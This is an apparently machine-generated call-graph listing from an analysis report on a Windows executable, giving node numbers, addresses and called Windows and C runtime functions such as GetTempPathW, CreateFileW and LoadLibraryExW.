15953->15957 15954 7ff7a6736720 98 API calls 15958 7ff7a6732c22 15954->15958 15959 7ff7a6732b7b 15955->15959 15960 7ff7a6732e00 75 API calls 15956->15960 15956->15962 15957->15944 15963 7ff7a6732dc6 15957->15963 15958->15930 15961 7ff7a6731af0 59 API calls 15958->15961 15975 7ff7a6732d3f 15958->15975 15959->15114 15960->15962 15964 7ff7a6732c7f 15961->15964 15962->15930 15962->15954 15965 7ff7a6732770 59 API calls 15963->15965 15964->15930 15967 7ff7a6731b30 49 API calls 15964->15967 15966 7ff7a6732d3a 15965->15966 15968 7ff7a6731ab0 74 API calls 15966->15968 15969 7ff7a6732ca7 15967->15969 15968->15930 15969->15963 15971 7ff7a6731b30 49 API calls 15969->15971 15970 7ff7a6732dab 15970->15963 15973 7ff7a6731440 161 API calls 15970->15973 15972 7ff7a6732cd4 15971->15972 15972->15963 15973->15970 15975->15970 15977 7ff7a6731780 59 API calls 15975->15977 15977->15975 15983 7ff7a67317a1 15982->15983 15984 7ff7a6731795 15982->15984 15983->15114 15985 7ff7a6732770 59 API calls 15984->15985 15985->15983 15987 7ff7a6736768 15986->15987 15988 7ff7a6736732 15986->15988 15987->15896 16042 7ff7a67316d0 15988->16042 15993 7ff7a6732770 59 API calls 15994 7ff7a673675d 15993->15994 15994->15896 15996 7ff7a6736a50 15995->15996 15997 7ff7a6731b30 49 API calls 15996->15997 15998 7ff7a6736a81 15997->15998 15999 7ff7a6731b30 49 API calls 15998->15999 16010 7ff7a6736c4b 15998->16010 16002 7ff7a6736aa8 15999->16002 16000 7ff7a673ad80 _wfindfirst32i64 8 API calls 16001 7ff7a673147f 16000->16001 16001->15899 16001->15900 16002->16010 16567 7ff7a67450e8 16002->16567 16004 7ff7a6736bb9 16005 7ff7a6737a30 57 API calls 16004->16005 16007 7ff7a6736bd1 16005->16007 16006 7ff7a6736c7a 16008 7ff7a6733cb0 116 API calls 16006->16008 16007->16006 16009 7ff7a6736990 61 API calls 16007->16009 16014 7ff7a6736c02 __vcrt_freefls 16007->16014 16008->16010 16009->16014 16010->16000 16011 7ff7a6736c6e 16013 7ff7a6732880 59 API calls 16011->16013 16012 7ff7a6736c3f 16576 7ff7a6732880 16012->16576 16013->16006 16014->16011 16014->16012 16016 7ff7a6736add 16016->16004 16016->16010 16017 7ff7a67450e8 49 API calls 16016->16017 16018 7ff7a6737a30 57 API calls 16016->16018 16019 7ff7a67378a0 58 API calls 16016->16019 16017->16016 16018->16016 16019->16016 16021 7ff7a67310a6 16020->16021 16022 7ff7a67310ad 16021->16022 16023 7ff7a67310d3 16021->16023 16024 7ff7a6732770 59 API calls 16022->16024 16026 7ff7a6731109 16023->16026 16027 7ff7a67310ed 16023->16027 16025 7ff7a67310c0 16024->16025 16025->15921 16029 7ff7a673111b 16026->16029 16034 7ff7a6731137 memcpy_s 16026->16034 16028 7ff7a67324d0 59 API calls 16027->16028 16032 7ff7a6731104 __vcrt_freefls 16028->16032 16030 7ff7a67324d0 59 API calls 16029->16030 16030->16032 16031 7ff7a673f5fc _fread_nolock 53 API calls 16031->16034 16032->15921 16033 7ff7a6732770 59 API calls 16033->16032 16034->16031 16034->16032 16035 7ff7a673fd3c 76 API calls 16034->16035 16036 7ff7a67311fe 16034->16036 16037 7ff7a673f370 37 API calls 16034->16037 16035->16034 16036->16033 16037->16034 16039 7ff7a673fd6c 16038->16039 16602 7ff7a673fa8c 16039->16602 16041 7ff7a673fd8a 16041->15925 16043 7ff7a67316f5 16042->16043 16044 7ff7a6732770 59 API calls 16043->16044 16045 7ff7a6731738 16043->16045 16044->16045 16046 7ff7a6736780 16045->16046 16047 7ff7a6736798 16046->16047 16048 7ff7a67367b8 16047->16048 16049 7ff7a673680b 16047->16049 16051 7ff7a6736990 61 API calls 16048->16051 16050 7ff7a6736810 GetTempPathW 16049->16050 16052 7ff7a6736825 16050->16052 16053 7ff7a67367c4 16051->16053 16086 7ff7a6732470 16052->16086 16110 7ff7a6736480 16053->16110 16058 7ff7a673ad80 _wfindfirst32i64 8 API calls 16061 7ff7a673674d 16058->16061 16060 7ff7a67367ea __vcrt_freefls 16060->16050 16063 7ff7a67367f8 16060->16063 16061->15987 16061->15993 16064 7ff7a673683e __vcrt_freefls 16065 7ff7a67368e6 16064->16065 16070 7ff7a6736871 16064->16070 16090 7ff7a674736c 16064->16090 16093 7ff7a67378a0 16064->16093 16067 7ff7a6737b40 59 API calls 16065->16067 16069 7ff7a67368f7 __vcrt_freefls 16067->16069 16073 7ff7a6737a30 57 API calls 16069->16073 16085 7ff7a67368aa __vcrt_freefls 16069->16085 16071 7ff7a6737a30 57 API calls 16070->16071 16070->16085 16072 7ff7a6736887 16071->16072 16074 7ff7a67368c9 SetEnvironmentVariableW 16072->16074 16075 7ff7a673688c 16072->16075 16076 7ff7a6736915 16073->16076 16074->16085 16077 7ff7a6737a30 57 API calls 16075->16077 16078 7ff7a673691a 16076->16078 16079 7ff7a673694d SetEnvironmentVariableW 16076->16079 16080 7ff7a673689c 16077->16080 16081 7ff7a6737a30 57 API calls 16078->16081 16079->16085 16082 7ff7a67466b4 38 API calls 16080->16082 16082->16085 16085->16058 16087 7ff7a6732495 16086->16087 16144 7ff7a6743e38 16087->16144 16316 7ff7a6746f98 16090->16316 16094 7ff7a673adb0 16093->16094 16095 7ff7a67378b0 GetCurrentProcess OpenProcessToken 16094->16095 16096 7ff7a67378fb GetTokenInformation 16095->16096 16099 7ff7a6737971 __vcrt_freefls 16095->16099 16097 7ff7a6737928 16096->16097 16098 7ff7a673791d GetLastError 16096->16098 16097->16099 16102 7ff7a673793e GetTokenInformation 16097->16102 16098->16097 16098->16099 16100 7ff7a673798a 16099->16100 16101 7ff7a6737984 CloseHandle 16099->16101 16447 7ff7a67375a0 16100->16447 16101->16100 16102->16099 16104 7ff7a6737964 ConvertSidToStringSidW 16102->16104 16104->16099 16111 7ff7a673648c 16110->16111 16112 7ff7a6737a30 57 API calls 16111->16112 16113 7ff7a67364ae 16112->16113 16114 7ff7a67364c9 ExpandEnvironmentStringsW 16113->16114 16115 7ff7a67364b6 16113->16115 16116 7ff7a67364ef __vcrt_freefls 16114->16116 16117 7ff7a6732770 59 API calls 16115->16117 16118 7ff7a6736506 16116->16118 16119 7ff7a67364f3 16116->16119 16123 7ff7a67364c2 16117->16123 16124 7ff7a6736520 16118->16124 16125 7ff7a6736514 16118->16125 16121 7ff7a6732770 59 API calls 16119->16121 16120 7ff7a673ad80 _wfindfirst32i64 8 API calls 16122 7ff7a67365e8 16120->16122 16121->16123 16122->16085 16134 7ff7a67466b4 16122->16134 16123->16120 16458 7ff7a6745348 16124->16458 16451 7ff7a6745f44 16125->16451 16128 7ff7a673651e 16129 7ff7a673653a 16128->16129 16132 7ff7a673654d __scrt_get_show_window_mode 16128->16132 16130 7ff7a6732770 59 API calls 16129->16130 16130->16123 16131 7ff7a67365c2 CreateDirectoryW 16131->16123 16132->16131 16133 7ff7a673659c CreateDirectoryW 16132->16133 16133->16132 16135 7ff7a67466c1 16134->16135 16136 7ff7a67466d4 16134->16136 16137 7ff7a6744444 _get_daylight 11 API calls 16135->16137 16559 7ff7a6746338 16136->16559 16139 7ff7a67466c6 16137->16139 16141 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16139->16141 16142 7ff7a67466d2 16141->16142 16142->16060 16147 7ff7a6743e92 16144->16147 16145 7ff7a6743eb7 16146 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16145->16146 16150 7ff7a6743ee1 16146->16150 16147->16145 16148 7ff7a6743ef3 16147->16148 16162 7ff7a67421f0 16148->16162 16151 7ff7a673ad80 _wfindfirst32i64 8 API calls 16150->16151 16154 7ff7a67324b4 16151->16154 16152 7ff7a6749e18 __free_lconv_mon 11 API calls 16152->16150 16153 7ff7a6743fa0 16159 7ff7a6743fd4 16153->16159 16161 7ff7a6743fa9 16153->16161 16154->16064 16156 7ff7a6743ffa 16157 7ff7a6744004 16156->16157 16156->16159 16160 7ff7a6749e18 __free_lconv_mon 11 API calls 16157->16160 16158 7ff7a6749e18 __free_lconv_mon 11 API calls 16158->16150 16159->16152 16160->16150 16161->16158 16163 7ff7a674222e 16162->16163 16164 7ff7a674221e 16162->16164 16165 7ff7a6742237 16163->16165 16166 7ff7a6742265 16163->16166 16167 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16164->16167 16168 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16165->16168 16166->16164 16169 7ff7a674225d 16166->16169 16173 7ff7a6742c04 16166->16173 16206 7ff7a6742650 16166->16206 16243 7ff7a6741de0 16166->16243 16167->16169 16168->16169 16169->16153 16169->16156 16169->16159 16169->16161 16174 7ff7a6742cb7 16173->16174 16175 7ff7a6742c46 16173->16175 16178 7ff7a6742cbc 16174->16178 16179 7ff7a6742d10 16174->16179 16176 7ff7a6742c4c 16175->16176 16177 7ff7a6742ce1 16175->16177 16180 7ff7a6742c51 16176->16180 16181 7ff7a6742c80 16176->16181 16262 7ff7a6740fb4 16177->16262 16182 7ff7a6742cbe 16178->16182 16183 7ff7a6742cf1 16178->16183 16185 7ff7a6742d27 16179->16185 16187 7ff7a6742d1a 16179->16187 16191 7ff7a6742d1f 16179->16191 16180->16185 16188 7ff7a6742c57 16180->16188 16181->16188 16181->16191 16186 7ff7a6742c60 16182->16186 16195 7ff7a6742ccd 16182->16195 16269 7ff7a6740ba4 16183->16269 16276 7ff7a674390c 16185->16276 16204 7ff7a6742d50 16186->16204 16246 7ff7a67433b8 16186->16246 16187->16177 16187->16191 16188->16186 16194 7ff7a6742c92 16188->16194 16202 7ff7a6742c7b 16188->16202 16191->16204 16280 7ff7a67413c4 16191->16280 16194->16204 16256 7ff7a67436f4 16194->16256 16195->16177 16197 7ff7a6742cd2 16195->16197 16200 7ff7a67437b8 37 API calls 16197->16200 16197->16204 16198 7ff7a673ad80 _wfindfirst32i64 8 API calls 16199 7ff7a674304a 16198->16199 16199->16166 16200->16202 16201 7ff7a6743a20 45 API calls 16205 7ff7a6742f3c 16201->16205 16202->16201 16202->16204 16202->16205 16204->16198 16205->16204 16287 7ff7a674dbb0 16205->16287 16207 7ff7a674265e 16206->16207 16208 7ff7a6742674 16206->16208 16209 7ff7a6742cb7 16207->16209 16210 7ff7a6742c46 16207->16210 16211 7ff7a67426b4 16207->16211 16208->16211 16212 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16208->16212 16215 7ff7a6742cbc 16209->16215 16216 7ff7a6742d10 16209->16216 16213 7ff7a6742c4c 16210->16213 16214 7ff7a6742ce1 16210->16214 16211->16166 16212->16211 16217 7ff7a6742c51 16213->16217 16218 7ff7a6742c80 16213->16218 16221 7ff7a6740fb4 38 API calls 16214->16221 16219 7ff7a6742cbe 16215->16219 16220 7ff7a6742cf1 16215->16220 16222 7ff7a6742d27 16216->16222 16224 7ff7a6742d1a 16216->16224 16228 7ff7a6742d1f 16216->16228 16217->16222 16225 7ff7a6742c57 16217->16225 16218->16225 16218->16228 16223 7ff7a6742c60 16219->16223 16232 7ff7a6742ccd 16219->16232 16226 7ff7a6740ba4 38 API calls 16220->16226 16239 7ff7a6742c7b 16221->16239 16229 7ff7a674390c 45 API calls 16222->16229 16227 7ff7a67433b8 47 API calls 16223->16227 16242 7ff7a6742d50 16223->16242 16224->16214 16224->16228 16225->16223 16230 7ff7a6742c92 16225->16230 16225->16239 16226->16239 16227->16239 16231 7ff7a67413c4 38 API calls 16228->16231 16228->16242 16229->16239 16233 7ff7a67436f4 46 API calls 16230->16233 16230->16242 16231->16239 16232->16214 16234 7ff7a6742cd2 16232->16234 16233->16239 16237 7ff7a67437b8 37 API calls 16234->16237 16234->16242 16235 7ff7a673ad80 _wfindfirst32i64 8 API calls 16236 7ff7a674304a 16235->16236 16236->16166 16237->16239 16238 7ff7a6743a20 45 API calls 16241 7ff7a6742f3c 16238->16241 16239->16238 16239->16241 16239->16242 16240 7ff7a674dbb0 46 API calls 16240->16241 16241->16240 16241->16242 16242->16235 16299 7ff7a6740228 16243->16299 16247 7ff7a67433de 16246->16247 16248 7ff7a673fde0 12 API calls 16247->16248 16249 7ff7a674342e 16248->16249 16257 7ff7a6743729 16256->16257 16258 7ff7a674376e 16257->16258 16259 7ff7a6743747 16257->16259 16260 7ff7a6743a20 45 API calls 16257->16260 16258->16202 16261 7ff7a674dbb0 46 API calls 16259->16261 16260->16259 16261->16258 16263 7ff7a6740fe7 16262->16263 16264 7ff7a6741016 16263->16264 16266 7ff7a67410d3 16263->16266 16265 7ff7a673fe88 12 API calls 16264->16265 16268 7ff7a6741053 16264->16268 16265->16268 16267 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16266->16267 16267->16268 16268->16202 16270 7ff7a6740bd7 16269->16270 16271 7ff7a6740c06 16270->16271 16273 7ff7a6740cc3 16270->16273 16272 7ff7a673fe88 12 API calls 16271->16272 16275 7ff7a6740c43 16271->16275 16272->16275 16274 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16273->16274 16274->16275 16275->16202 16277 7ff7a674394f 16276->16277 16278 7ff7a67439a8 45 API calls 16277->16278 16279 7ff7a6743953 __crtLCMapStringW 16277->16279 16278->16279 16279->16202 16281 7ff7a67413f7 16280->16281 16282 7ff7a6741426 16281->16282 16284 7ff7a67414e3 16281->16284 16283 7ff7a673fe88 12 API calls 16282->16283 16286 7ff7a6741463 16282->16286 16283->16286 16285 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16284->16285 16285->16286 16286->16202 16288 7ff7a674dbe1 16287->16288 16296 7ff7a674dbef 16287->16296 16288->16296 16296->16205 16300 7ff7a674025d 16299->16300 16301 7ff7a674026f 16299->16301 16302 7ff7a6744444 _get_daylight 11 API calls 16300->16302 16304 7ff7a674027d 16301->16304 16308 7ff7a67402b9 16301->16308 16303 7ff7a6740262 16302->16303 16305 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16303->16305 16306 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16304->16306 16313 7ff7a674026d 16305->16313 16306->16313 16307 7ff7a6740635 16309 7ff7a6744444 _get_daylight 11 API calls 16307->16309 16307->16313 16308->16307 16310 7ff7a6744444 _get_daylight 11 API calls 16308->16310 16311 7ff7a67408c9 16309->16311 16312 7ff7a674062a 16310->16312 16314 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16311->16314 16315 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16312->16315 16313->16166 16314->16313 16315->16307 16357 7ff7a6750698 16316->16357 16416 7ff7a6750410 16357->16416 16437 7ff7a674f788 EnterCriticalSection 16416->16437 16448 7ff7a67375c5 16447->16448 16449 7ff7a6743e38 48 API calls 16448->16449 16452 7ff7a6745f95 16451->16452 16453 7ff7a6745f62 16451->16453 16452->16128 16453->16452 16470 7ff7a674f924 16453->16470 16456 7ff7a6749dd0 _wfindfirst32i64 17 API calls 16457 7ff7a6745fc5 16456->16457 16459 7ff7a67453d2 16458->16459 16460 7ff7a6745364 16458->16460 16504 7ff7a674f090 16459->16504 16460->16459 16462 7ff7a6745369 16460->16462 16463 7ff7a674539e 16462->16463 16464 7ff7a6745381 16462->16464 16487 7ff7a674518c GetFullPathNameW 16463->16487 16479 7ff7a6745118 GetFullPathNameW 16464->16479 16469 7ff7a6745396 __vcrt_freefls 16469->16128 16471 7ff7a674f93b 16470->16471 16472 7ff7a674f931 16470->16472 16473 7ff7a6744444 _get_daylight 11 API calls 16471->16473 16472->16471 16477 7ff7a674f957 16472->16477 16474 7ff7a674f943 16473->16474 16476 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16474->16476 16475 7ff7a6745f91 16475->16452 16475->16456 16476->16475 16477->16475 16478 7ff7a6744444 _get_daylight 11 API calls 16477->16478 16478->16474 16480 7ff7a674513e GetLastError 16479->16480 16481 7ff7a6745154 16479->16481 16482 7ff7a67443b8 _fread_nolock 11 API calls 16480->16482 16483 7ff7a6745150 16481->16483 16485 7ff7a6744444 _get_daylight 11 API calls 16481->16485 16484 7ff7a674514b 16482->16484 16483->16469 16486 7ff7a6744444 _get_daylight 11 API calls 16484->16486 16485->16483 16486->16483 16488 7ff7a67451bf GetLastError 16487->16488 16492 7ff7a67451d5 __vcrt_freefls 16487->16492 16489 7ff7a67443b8 _fread_nolock 11 API calls 16488->16489 16490 7ff7a67451cc 16489->16490 16493 7ff7a6744444 _get_daylight 11 API calls 16490->16493 16491 7ff7a67451d1 16495 7ff7a6745264 16491->16495 16492->16491 16494 7ff7a674522f GetFullPathNameW 16492->16494 16493->16491 16494->16488 16494->16491 16499 7ff7a67452d8 memcpy_s 16495->16499 16500 7ff7a674528d __scrt_get_show_window_mode 16495->16500 16499->16469 16500->16499 16507 7ff7a674eea0 16504->16507 16508 7ff7a674eecb 16507->16508 16509 7ff7a674eee2 16507->16509 16512 7ff7a6744444 _get_daylight 11 API calls 16508->16512 16510 7ff7a674ef07 16509->16510 16511 7ff7a674eee6 16509->16511 16545 7ff7a674e508 16510->16545 16533 7ff7a674f00c 16511->16533 16515 7ff7a674eed0 16512->16515 16519 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16515->16519 16532 7ff7a674eedb __vcrt_freefls 16519->16532 16534 7ff7a674f056 16533->16534 16535 7ff7a674f026 16533->16535 16536 7ff7a674f041 16534->16536 16537 7ff7a674f061 GetDriveTypeW 16534->16537 16538 7ff7a6744424 _fread_nolock 11 API calls 16535->16538 16537->16536 16546 7ff7a673c210 __scrt_get_show_window_mode 16545->16546 16547 7ff7a674e53e GetCurrentDirectoryW 16546->16547 16566 7ff7a674f788 EnterCriticalSection 16559->16566 16568 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16567->16568 16570 7ff7a67450fd 16568->16570 16569 7ff7a674ee97 16589 7ff7a673af14 16569->16589 16570->16569 16573 7ff7a674edb6 16570->16573 16574 7ff7a673ad80 _wfindfirst32i64 8 API calls 16573->16574 16575 7ff7a674ee8f 16574->16575 16575->16016 16577 7ff7a67328a0 16576->16577 16578 7ff7a6743be4 49 API calls 16577->16578 16579 7ff7a67328ed __scrt_get_show_window_mode 16578->16579 16580 7ff7a6737a30 57 API calls 16579->16580 16581 7ff7a673291a 16580->16581 16582 7ff7a6732959 MessageBoxA 16581->16582 16583 7ff7a673291f 16581->16583 16592 7ff7a673af28 IsProcessorFeaturePresent 16589->16592 16593 7ff7a673af3f 16592->16593 16598 7ff7a673afc4 RtlCaptureContext RtlLookupFunctionEntry 16593->16598 16599 7ff7a673af53 16598->16599 16600 7ff7a673aff4 RtlVirtualUnwind 16598->16600 16601 7ff7a673ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16599->16601 16600->16599 16603 7ff7a673faac 16602->16603 16608 7ff7a673fad9 16602->16608 16604 7ff7a673fae1 16603->16604 16605 7ff7a673fab6 16603->16605 16603->16608 16609 7ff7a673f9cc 16604->16609 16606 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16605->16606 16606->16608 16608->16041 16616 7ff7a67442ec EnterCriticalSection 16609->16616 16618 7ff7a6732e34 16617->16618 16619 7ff7a6743be4 49 API calls 16618->16619 16620 7ff7a6732e5a 16619->16620 16621 7ff7a6732e6b 16620->16621 16649 7ff7a6744e08 16620->16649 16623 7ff7a673ad80 _wfindfirst32i64 8 API calls 16621->16623 16624 7ff7a6732a8d 16623->16624 16624->15936 16624->15937 16626 7ff7a673660e 16625->16626 16627 7ff7a6733cb0 116 API calls 16626->16627 16628 7ff7a6736635 16627->16628 16629 7ff7a6736a40 136 API calls 16628->16629 16630 7ff7a6736643 16629->16630 16631 7ff7a67366f3 16630->16631 16633 7ff7a673665d 16630->16633 16632 7ff7a67366ef 16631->16632 16635 7ff7a673f2ac 74 API calls 16631->16635 16636 7ff7a673ad80 _wfindfirst32i64 8 API calls 16632->16636 16833 7ff7a673f344 16633->16833 16635->16632 16638 7ff7a6736715 16636->16638 16637 7ff7a67366d0 16639 7ff7a673f2ac 74 API calls 16637->16639 16638->15944 16640 7ff7a673f5fc _fread_nolock 53 API calls 16647 7ff7a6736662 16640->16647 16643 7ff7a673f370 37 API calls 16643->16647 16644 7ff7a673fd3c 76 API calls 16644->16647 16645 7ff7a6736699 16839 7ff7a6747388 16645->16839 16646 7ff7a673f344 37 API calls 16646->16647 16647->16637 16647->16640 16647->16643 16647->16644 16647->16645 16647->16646 16650 7ff7a6744e31 16649->16650 16651 7ff7a6744e25 16649->16651 16691 7ff7a6744a1c 16650->16691 16666 7ff7a6744680 16651->16666 16654 7ff7a6744e2a 16654->16621 16657 7ff7a6744e69 16702 7ff7a6744504 16657->16702 16660 7ff7a6744ed9 16662 7ff7a6744680 69 API calls 16660->16662 16661 7ff7a6744ec5 16661->16654 16664 7ff7a6749e18 __free_lconv_mon 11 API calls 16661->16664 16663 7ff7a6744ee5 16662->16663 16663->16654 16665 7ff7a6749e18 __free_lconv_mon 11 API calls 16663->16665 16664->16654 16665->16654 16667 7ff7a674469a 16666->16667 16668 7ff7a67446b7 16666->16668 16669 7ff7a6744424 _fread_nolock 11 API calls 16667->16669 16668->16667 16670 7ff7a67446ca CreateFileW 16668->16670 16671 7ff7a674469f 16669->16671 16672 7ff7a67446fe 16670->16672 16673 7ff7a6744734 16670->16673 16675 7ff7a6744444 _get_daylight 11 API calls 16671->16675 16724 7ff7a67447d4 GetFileType 16672->16724 16750 7ff7a6744cf8 16673->16750 16678 7ff7a67446a7 16675->16678 16682 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16678->16682 16680 7ff7a6744768 16771 7ff7a6744ab8 16680->16771 16681 7ff7a674473d 16685 7ff7a67443b8 _fread_nolock 11 API calls 16681->16685 16687 7ff7a67446b2 16682->16687 16683 7ff7a6744729 CloseHandle 16683->16687 16684 7ff7a6744713 CloseHandle 16684->16687 16690 7ff7a6744747 16685->16690 16687->16654 16690->16687 16692 7ff7a6744a40 16691->16692 16698 7ff7a6744a3b 16691->16698 16693 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16692->16693 16692->16698 16694 7ff7a6744a5b 16693->16694 16812 7ff7a674cb2c 16694->16812 16698->16657 16699 7ff7a674dfcc 16698->16699 16820 7ff7a674ddb8 16699->16820 16703 7ff7a674452e 16702->16703 16704 7ff7a6744552 16702->16704 16708 7ff7a6749e18 __free_lconv_mon 11 API calls 16703->16708 16711 7ff7a674453d 16703->16711 16705 7ff7a6744557 16704->16705 16706 7ff7a67445ac 16704->16706 16709 7ff7a674456c 16705->16709 16705->16711 16712 7ff7a6749e18 __free_lconv_mon 11 API calls 16705->16712 16830 7ff7a674e7f0 16706->16830 16708->16711 16713 7ff7a674cacc _fread_nolock 12 API calls 16709->16713 16711->16660 16711->16661 16712->16709 16713->16711 16725 7ff7a6744822 16724->16725 16726 7ff7a67448df 16724->16726 16727 7ff7a674484e GetFileInformationByHandle 16725->16727 16734 7ff7a6744bf4 21 API calls 16725->16734 16728 7ff7a6744909 16726->16728 16729 7ff7a67448e7 16726->16729 16730 7ff7a67448fa GetLastError 16727->16730 16731 7ff7a6744877 16727->16731 16733 7ff7a674492c PeekNamedPipe 16728->16733 16748 7ff7a67448ca 16728->16748 16729->16730 16732 7ff7a67448eb 16729->16732 16737 7ff7a67443b8 _fread_nolock 11 API calls 16730->16737 16735 7ff7a6744ab8 51 API calls 16731->16735 16736 7ff7a6744444 _get_daylight 11 API calls 16732->16736 16733->16748 16740 7ff7a674483c 16734->16740 16738 7ff7a6744882 16735->16738 16736->16748 16737->16748 16788 7ff7a674497c 16738->16788 16739 7ff7a673ad80 _wfindfirst32i64 8 API calls 16742 7ff7a674470c 16739->16742 16740->16727 16740->16748 16742->16683 16742->16684 16744 7ff7a674497c 10 API calls 16748->16739 16751 7ff7a6744d2e 16750->16751 16752 7ff7a6744dc6 __vcrt_freefls 16751->16752 16753 7ff7a6744444 _get_daylight 11 API calls 16751->16753 16754 7ff7a673ad80 _wfindfirst32i64 8 API calls 16752->16754 16755 7ff7a6744d40 16753->16755 16756 7ff7a6744739 16754->16756 16757 7ff7a6744444 _get_daylight 11 API calls 16755->16757 16756->16680 16756->16681 16758 7ff7a6744d48 16757->16758 16759 7ff7a6745348 45 API calls 16758->16759 16760 7ff7a6744d5d 16759->16760 16761 7ff7a6744d6f 16760->16761 16762 7ff7a6744d65 16760->16762 16764 7ff7a6744444 _get_daylight 11 API calls 16761->16764 16763 7ff7a6744444 _get_daylight 11 API calls 16762->16763 16768 7ff7a6744d6a 16763->16768 16765 7ff7a6744d74 16764->16765 16765->16752 16766 7ff7a6744444 _get_daylight 11 API calls 16765->16766 16768->16752 16770 7ff7a6744db8 GetDriveTypeW 16768->16770 16770->16752 16772 7ff7a6744ae0 16771->16772 16780 7ff7a6744775 16772->16780 16795 7ff7a674e674 16772->16795 16781 7ff7a6744bf4 16780->16781 16782 7ff7a6744c0e 16781->16782 16783 7ff7a6744c45 16782->16783 16784 7ff7a6744c1e 16782->16784 16789 7ff7a6744998 16788->16789 16790 7ff7a67449a5 FileTimeToSystemTime 16788->16790 16789->16790 16792 7ff7a67449a0 16789->16792 16791 7ff7a67449b9 SystemTimeToTzSpecificLocalTime 16790->16791 16790->16792 16791->16792 16793 7ff7a673ad80 _wfindfirst32i64 8 API calls 16792->16793 16794 7ff7a6744891 16793->16794 16794->16744 16796 7ff7a674e6a5 16795->16796 16797 7ff7a674e681 16795->16797 16800 7ff7a674e6df 16796->16800 16801 7ff7a674e6fe 16796->16801 16797->16796 16798 7ff7a674e686 16797->16798 16799 7ff7a6744444 _get_daylight 11 API calls 16798->16799 16803 7ff7a6744444 _get_daylight 11 API calls 16800->16803 16805 7ff7a6744a1c 45 API calls 16801->16805 16813 7ff7a6744a7e 16812->16813 16814 7ff7a674cb41 16812->16814 16816 7ff7a674cb98 16813->16816 16814->16813 16815 7ff7a6752424 45 API calls 16814->16815 16815->16813 16817 7ff7a674cbad 16816->16817 16818 7ff7a674cbc0 16816->16818 16817->16818 16819 7ff7a6751790 45 API calls 16817->16819 16818->16698 16819->16818 16821 7ff7a674de10 __vcrt_FlsAlloc 16820->16821 16822 7ff7a674de15 16820->16822 16821->16822 16823 7ff7a674de45 LoadLibraryExW 16821->16823 16824 7ff7a674df3a GetProcAddress 16821->16824 16829 7ff7a674dea4 LoadLibraryExW 16821->16829 16822->16657 16825 7ff7a674df1a 16823->16825 16826 7ff7a674de6a GetLastError 16823->16826 16824->16822 16828 7ff7a674df4b 16824->16828 16825->16824 16827 7ff7a674df31 FreeLibrary 16825->16827 16826->16821 16827->16824 16828->16822 16829->16821 16829->16825 16832 7ff7a674e7f9 MultiByteToWideChar 16830->16832 16834 7ff7a673f34d 16833->16834 16835 7ff7a673f35d 16833->16835 16836 7ff7a6744444 _get_daylight 11 API calls 16834->16836 16835->16647 16837 7ff7a673f352 16836->16837 16838 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16837->16838 16838->16835 16860 7ff7a674918d 16859->16860 16864 7ff7a673707a 16859->16864 16861 7ff7a6744444 _get_daylight 11 API calls 16860->16861 16862 7ff7a6749192 16861->16862 16863 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16862->16863 16863->16864 16865 7ff7a6746ef8 16864->16865 16866 7ff7a6746f01 16865->16866 16867 7ff7a6746f16 16865->16867 16868 7ff7a6744424 _fread_nolock 11 API calls 16866->16868 16870 7ff7a6744424 _fread_nolock 11 API calls 16867->16870 16873 7ff7a6746f0e 16867->16873 16869 7ff7a6746f06 16868->16869 16871 7ff7a6744444 _get_daylight 11 API calls 16869->16871 16872 7ff7a6746f51 16870->16872 16871->16873 16874 7ff7a6744444 _get_daylight 11 API calls 16872->16874 16873->15133 16875 7ff7a6746f59 16874->16875 16876 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16875->16876 16876->16873 16916 7ff7a67453fc 16915->16916 16917 7ff7a6745422 16916->16917 16919 7ff7a6745455 16916->16919 16918 7ff7a6744444 _get_daylight 11 API calls 16917->16918 16920 7ff7a6745427 16918->16920 16921 7ff7a6745468 16919->16921 16922 7ff7a674545b 16919->16922 16923 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16920->16923 16934 7ff7a674a0f8 16921->16934 16924 7ff7a6744444 _get_daylight 11 API calls 16922->16924 16926 7ff7a6733d09 16923->16926 16924->16926 16926->15193 16947 7ff7a674f788 EnterCriticalSection 16934->16947 17295 7ff7a6747968 17294->17295 17298 7ff7a6747444 17295->17298 17297 7ff7a6747981 17297->15203 17299 7ff7a674748e 17298->17299 17300 7ff7a674745f 17298->17300 17308 7ff7a67442ec EnterCriticalSection 17299->17308 17301 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 17300->17301 17303 7ff7a674747f 17301->17303 17303->17297 17310 7ff7a673f0d1 17309->17310 17311 7ff7a673f0a3 17309->17311 17315 7ff7a673f0c3 17310->17315 17319 7ff7a67442ec EnterCriticalSection 17310->17319 17312 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 17311->17312 17312->17315 17315->15207 17321 7ff7a67312f8 17320->17321 17322 7ff7a67312c6 17320->17322 17324 7ff7a673f934 73 API calls 17321->17324 17323 7ff7a6733cb0 116 API calls 17322->17323 17325 7ff7a67312d6 17323->17325 17326 7ff7a673130a 17324->17326 17325->17321 17329 7ff7a67312de 17325->17329 17327 7ff7a673130e 17326->17327 17328 7ff7a673132f 17326->17328 17330 7ff7a67324d0 59 API calls 17327->17330 17334 7ff7a6731364 17328->17334 17335 7ff7a6731344 17328->17335 17331 7ff7a6732770 59 API calls 17329->17331 17332 7ff7a6731325 17330->17332 17333 7ff7a67312ee 17331->17333 17332->15218 17333->15218 17337 7ff7a673137e 